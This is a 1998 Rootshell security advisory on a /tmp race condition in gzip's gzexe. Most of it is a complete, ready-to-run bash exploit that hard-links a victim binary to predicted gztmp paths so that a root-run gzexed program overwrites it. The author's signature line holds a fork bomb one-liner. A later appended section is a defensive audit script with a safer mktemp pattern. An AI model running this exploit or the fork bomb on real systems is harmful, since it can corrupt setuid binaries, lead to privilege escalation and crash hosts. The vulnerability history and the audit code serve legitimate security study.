[ http://www.rootshell.com/ - 1/28/98 ]

01. GZEXE exploit
-----------------

The following is courtesy Michał Zalewski

** DESCRIPTION **

GZEXE, part of the gzip package, is a small utility which allows 'transparent' compression of any kind of executable (just like pklite under ms-dos). Unfortunately, it may be extremely dangerous. Here's the shell script used for decompression:

if /usr/bin/tail +$skip $0 | "/usr/bin"/gzip -cd > /tmp/gztmp$$; then...
                             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[...]
/tmp/gztmp$$ ${1+"$@"}; res=$?
^^^^^^^^^^^^

Just look at this... An example of a badly-written one ;) It's possible to overwrite any file (including SUIDs!) with the code of a gzexed executable when root executes it... Then, this unwanted suid may be easily exploited. It's also possible to force execution of OUR OWN code instead of the gzexed program, just by choosing as a victim any file not owned by the user running the vulnerable executable, but writable by him/her. This file (even setuid) may be freely modified by the attacker... Whoops!

** EXPLOIT **

-- GZEXE EXPLOIT --

#!/bin/bash
# GZEXE executables exploit (gzip 1.2.4)
# by Michal Zalewski (lcamtuf@staszic.waw.pl)
# ---------------------------------------------

VICTIM=/bin/ping
GZEXED=a.out

# Note: to locate gzexed executables you may use this:
# find / -type f -exec grep "/tmp/gztmp\\\$\\\$ \\\$" {} \; -print|cut -f 1 -d " "

if [ ! -f $VICTIM ]; then
  echo "I can't find my victim ($VICTIM)..."
  exit 0
fi

ORIG=`ls -l $VICTIM|awk '{print \$5}'`

echo "GZEXE exploit launched against $VICTIM ($ORIG bytes)."

renice +20 $PPID >&/dev/null
cd /tmp
touch $GZEXED

while :; do
  START=`ps|awk '$6=="ps"{print $1}'`
  let START=START+100
  let DO=START+100
  while [ "$START" -lt "$DO" ]; do
    ln $VICTIM gztmp$START &>/dev/null
    let START=START+1
  done
  sleep 10
  rm -f gztmp* &>/dev/null
  NOWY=`ls -l $VICTIM|awk '{print \$5}'`
  if [ ! "$ORIG" = "$NOWY" ]; then
    echo "Done, my master."
    exit 0
  fi
done

-- EOF --

It may be left in the background, just like my gcc-exploit-2. Please verify the vulnerable executable filename (GZEXED - you may specify more than one file, separated by spaces).

** FIX **

DO NOT USE GZEXE TO COMPRESS EXECUTABLES. That's all, TMPDIR will NOT help in this case.

_______________________________________________________________________
Michal Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
To iterate is human, to recurse divine [P. Deutsch]
=------- [ echo -e "while :;do \$0&\ndone">_;chmod +x _;./_ ] --------=
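As an added example for the FIX section (not part of the original advisory or of gzip), a shell audit that finds gzexe-style stubs writing to the predictable /tmp/gztmp$$ path, the same signature the exploit's find comment greps for, alongside the private temp-directory pattern a wrapper needs so a pre-placed link is never opened. The function names and the sample stub are constructed for this example.

```shell
#!/bin/sh
# Added example, not from the original advisory. Audits a tree for gzexe-style
# self-extracting stubs that decompress into a guessable /tmp/gztmp$$ path
# (the weakness described above) and shows the temp-file pattern that
# closes it. Function names and the sample stub are constructed here.

# Succeed if the file begins with a shell stub that writes to /tmp/gztmp$$.
# Only the first 2 KiB are inspected: a gzexe wrapper is a short shell script
# followed by compressed binary data, so grepping whole files is just noise.
is_vulnerable_gzexe() {
    head -c 2048 "$1" 2>/dev/null | grep -q '/tmp/gztmp\$\$'
}

# Print every regular file under $1 whose stub matches, one path per line.
find_vulnerable_gzexe() {
    find "$1" -type f | while IFS= read -r f; do
        if is_vulnerable_gzexe "$f"; then printf '%s\n' "$f"; fi
    done
}

# The pattern a wrapper should use instead: mktemp makes a fresh 0700
# directory with an unguessable name, and the image is created inside it.
# A hard link or symlink pre-placed at a guessed /tmp/gztmp<pid> is never
# opened, so nothing outside the private directory can be overwritten.
create_private_tmpfile() {
    dir=$(mktemp -d "${TMPDIR:-/tmp}/gzexe.XXXXXX") || return 1
    : > "$dir/image" || return 1
    printf '%s\n' "$dir/image"
}

# Build a constructed sample tree: one fake stub copied from the vulnerable
# gzexe header quoted in the advisory, and one clean script. Prints the dir.
make_sample_tree() {
    d=$(mktemp -d "${TMPDIR:-/tmp}/gzaudit.XXXXXX") || return 1
    printf '#!/bin/sh\nif /usr/bin/tail +$skip $0 | "/usr/bin"/gzip -cd > /tmp/gztmp$$; then\n' > "$d/packed"
    printf '#!/bin/sh\necho clean\n' > "$d/clean"
    printf '%s\n' "$d"
}

# Usage: . ./gzexe_audit.sh; find_vulnerable_gzexe /usr/bin
```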